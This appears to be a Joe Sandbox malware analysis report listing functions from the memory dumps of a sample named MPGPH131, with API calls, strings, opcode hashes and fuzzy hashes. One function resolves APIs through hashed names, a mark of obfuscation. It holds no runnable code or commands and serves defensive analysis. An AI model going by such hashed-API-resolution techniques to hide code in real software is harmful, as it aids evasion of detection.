GetCurrentThreadId.KERNEL32 ref: 0064C18B
GetCurrentThreadId.KERNEL32 ref: 0064C1D1

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CurrentThread$Xtime_diff_to_millis2
String ID:
API String ID: 1280559528-0
Opcode ID: 749ca56055c60945bda6b846443698de55d30dd82488773b17a6041d573482cd
Instruction ID: 0da9a2b0417093f916045043a3d97833515c8041a823d881dbaa521cc3f99ee0
Opcode Fuzzy Hash: 749ca56055c60945bda6b846443698de55d30dd82488773b17a6041d573482cd
Instruction Fuzzy Hash: AA515871901615CFCFA0DF24C8819A9B7B3BF48730B254459E80AAB352DB31ED81CBA4

Function 00664B87 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00664C96,00572D8D,?,00000000,?,?,?,00664EC0,00000022,FlsSetValue,00680AD8,00680AE0,?), ref: 00664C48

Strings

api-ms-, xrefs: 00664BDE
ext-ms-, xrefs: 00664BF2

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 35c8655a8166cb63a219cefae939d00e1fb114dcd510450ff51136c9be641ad1
Instruction ID: 758a5118883403a8ea0d240257c9e92e5990e10afc84155d3e66986894dce034
Opcode Fuzzy Hash: 35c8655a8166cb63a219cefae939d00e1fb114dcd510450ff51136c9be641ad1
Instruction Fuzzy Hash: 48210671A02225ABDB25EB65EC44B9B376BEB42774F251114E916A73D1DF30EF00CAD0

Function 0064C771 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C7BA
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C825
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C842
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C881
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C8E0
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C903

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 8f0f12a281b30cb0afd653d75a48bc34250a669173de77d46a0661e8bde9ce20
Instruction ID: 2d7c3b42b0261af375db9a79780b1dbe691f12a95fa84a2751ac9bb1b5ce83d9
Opcode Fuzzy Hash: 8f0f12a281b30cb0afd653d75a48bc34250a669173de77d46a0661e8bde9ce20
Instruction Fuzzy Hash: 8851B07290220ABFEF609FA4CC45FEB7BABEF44760F154529F914A6351DB318D508B90

Function 005D9520 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005D9543
std::_Lockit::_Lockit.LIBCPMT ref: 005D9566
std::_Lockit::~_Lockit.LIBCPMT ref: 005D9586
std::_Facet_Register.LIBCPMT ref: 005D95FB
std::_Lockit::~_Lockit.LIBCPMT ref: 005D9613
Concurrency::cancel_current_task.LIBCPMT ref: 005D962B

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 65c787b476747ab718782a2dd89a61d57f4a9bc7d45822146567b1edc279a298
Instruction ID: 640745403de66d693c2ed94f2d3ffdacf81087b1976a3c234d89e6f1447ee982
Opcode Fuzzy Hash: 65c787b476747ab718782a2dd89a61d57f4a9bc7d45822146567b1edc279a298
Instruction Fuzzy Hash: AC41DF71D002199FCB25EF58E840AAABBB5FF42320F14466AE9196B391D730EE05CBD1

Function 0065CBE3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FADDE7BB,?,?,00000000,0067ACB1,000000FF,?,0065CBBF,?,?,0065CB93,00000016), ref: 0065CC18
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0065CC2A
FreeLibrary.KERNEL32(00000000,?,00000000,0067ACB1,000000FF,?,0065CBBF,?,?,0065CB93,00000016), ref: 0065CC4C

Strings

mscoree.dll, xrefs: 0065CC11
CorExitProcess, xrefs: 0065CC22

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3efd8c89a7c24518b42e7d73edfa174541974a6bc97351ee868d3e397a29dbf1
Instruction ID: cb542aab21bf1b005bd036e32ac635eeccd9c91589c15a5efa77df23def8888d
Opcode Fuzzy Hash: 3efd8c89a7c24518b42e7d73edfa174541974a6bc97351ee868d3e397a29dbf1
Instruction Fuzzy Hash: A501A231940619EFCB159B54DC05FEEBBFAFB44B32F008629F819A2290DB759A44CA90

Function 0057A400 Relevance: 7.6, APIs: 5, Instructions: 118memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?), ref: 0057A478
GetProcAddress.KERNEL32(00000000,?), ref: 0057A483
GetProcessHeap.KERNEL32(?,?), ref: 0057A490
RtlAllocateHeap.NTDLL(00000000,00000000,00010000), ref: 0057A4A6
RtlAllocateHeap.NTDLL(?,00000000,00010000), ref: 0057A4DC

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Heap$Allocate$AddressHandleModuleProcProcess
String ID:
API String ID: 3330366720-0
Opcode ID: 80b8550d54cecd6cb2b04c3f5873e4b191f9fc60e2468660b57773ef8028d0f9
Instruction ID: 74c70e1e05b9f7882dd127e91a0d8a487676367ac59226a2e56006733d196021
Opcode Fuzzy Hash: 80b8550d54cecd6cb2b04c3f5873e4b191f9fc60e2468660b57773ef8028d0f9
Instruction Fuzzy Hash: 8A41E731A04348ABDB10DFE9EC88B9EBBB9EF89324F10416DE90CE7251D67159448BA5

Function 00575DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005760F2
___std_exception_destroy.LIBVCRUNTIME ref: 0057617F
___std_exception_copy.LIBVCRUNTIME ref: 00576248

Strings

recursive_directory_iterator::operator++, xrefs: 005761CC

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 2b73455c5e14795d587cee27cc92188ce4cafdde59252b77546ebf66d903ad0a
Instruction ID: 94fb78dab9a06c4ea8486905a2b5b42bfd3881907d14ebba699ef4a96e3a9948
Opcode Fuzzy Hash: 2b73455c5e14795d587cee27cc92188ce4cafdde59252b77546ebf66d903ad0a
Instruction Fuzzy Hash: E0E115B09006059FDB28DF68D845B9EFBF9FF44310F10861EE45697781E774AA48CBA1

Function 005784C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005786DE
___std_exception_destroy.LIBVCRUNTIME ref: 005786ED

Strings

at line , xrefs: 00578518
, column , xrefs: 00578555, 0057856B

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 388e7977b9ae18869e6fc078aebbebeb935a0133428aed56804951e330c7aa44
Instruction ID: 6020f7aa3f7c89ccae9f9840e55fa33693aa118d5697cc9bf809f3051704ca38
Opcode Fuzzy Hash: 388e7977b9ae18869e6fc078aebbebeb935a0133428aed56804951e330c7aa44
Instruction Fuzzy Hash: D9613F71900204AFDB08CF68DC89BADBFB6FF54310F14821DE419A7782DB74AA849795

Function 005E34C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005E3946
___std_exception_destroy.LIBVCRUNTIME ref: 005E395F
___std_exception_destroy.LIBVCRUNTIME ref: 005E3A97
___std_exception_destroy.LIBVCRUNTIME ref: 005E3AB0
___std_exception_destroy.LIBVCRUNTIME ref: 005E3C16
___std_exception_destroy.LIBVCRUNTIME ref: 005E3C2F
___std_exception_destroy.LIBVCRUNTIME ref: 005E4479
___std_exception_destroy.LIBVCRUNTIME ref: 005E4492

Strings

value, xrefs: 005E439F

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 389300136a14fb1aefb9bb9f51709706e747904e90d9774e20e2989ad6d31912
Instruction ID: 2063a5277d8beb501146bb48b69c36a3d64032476f61f5054fc75d28bbe13a20
Opcode Fuzzy Hash: 389300136a14fb1aefb9bb9f51709706e747904e90d9774e20e2989ad6d31912
Instruction Fuzzy Hash: 5E519D71C00298DBDB14DBA4CC99B9EBFB5BF05304F148259E449A7382D7756A888B61

Function 00573B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00573C0F

Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB

Strings

ios_base::failbit set, xrefs: 00573AC8, 00573BB1
ios_base::eofbit set, xrefs: 00573BB6
ios_base::badbit set, xrefs: 00573BA7, 00573BD2, 00573BF3

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: f2b8f0b6e0dacafade04c0a9a450e01c7165e0e1a84456768d78c23678690c36
Instruction ID: 0d9caaa546c0001440cf2de3432e7ca636dc8f30e409ee65f6add67a7f9bdaf4
Opcode Fuzzy Hash: f2b8f0b6e0dacafade04c0a9a450e01c7165e0e1a84456768d78c23678690c36
Instruction Fuzzy Hash: 7F11F0B2900708ABC710DF68E805A9ABBEDBF05320F14C52AF95C9B641F771A9149BA1

Function 00662622 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(FADDE7BB,00000000,00000000,?), ref: 00662685

Part of subcall function 00668463: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0066406B,?,00000000,-00000008), ref: 006684C4

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006628D7
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0066291D
GetLastError.KERNEL32 ref: 006629C0

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: a62f1481ad6d9ac293be52a7c779263690d720e0dc05d27b7a889ec89e52962d
Instruction ID: f17b1413410d9dca8c03b7b7d326bb3eb05e5e4af0e19ec35f7f7405bd07649d
Opcode Fuzzy Hash: a62f1481ad6d9ac293be52a7c779263690d720e0dc05d27b7a889ec89e52962d
Instruction Fuzzy Hash: 9BD19C75E006499FCF05CFE8D8909EDBBB6FF49310F18466AE456EB351D630A942CB50

Function 0057A5B0 Relevance: 6.1, APIs: 4, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(B6BDACB9), ref: 0057A619
GetProcAddress.KERNEL32(00000000,AF88AC99), ref: 0057A624
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0057A6A2
SetEvent.KERNEL32(00000000), ref: 0057A6A9

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Event$AddressCreateHandleModuleProc
String ID:
API String ID: 2341598627-0
Opcode ID: ee9f8b35cf51ce4c90e999790022f32240235b902f37b4d3129c1c1922229809
Instruction ID: ce44afcf5519c3579bb0b83363dca2b88c9bb4940be3ec3b9a0b540ff07963ab
Opcode Fuzzy Hash: ee9f8b35cf51ce4c90e999790022f32240235b902f37b4d3129c1c1922229809
Instruction Fuzzy Hash: 7B31C171914388EAEF04DFE4DC09BEEBBB9EF18304F10006DE545AA251E7B25648C7A6

Function 0064B305 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000400,?,?,?,?,00000000,00000000,?,?,?,005D979F,00000000,?,?,00000000), ref: 0064B322
GetLastError.KERNEL32(?,005D979F,00000000,?,?,00000000,00000000,?,?), ref: 0064B32E
WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,005D979F,00000000,?,?,00000000,00000000,?), ref: 0064B354
GetLastError.KERNEL32(?,005D979F,00000000,?,?,00000000,00000000,?,?), ref: 0064B360

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
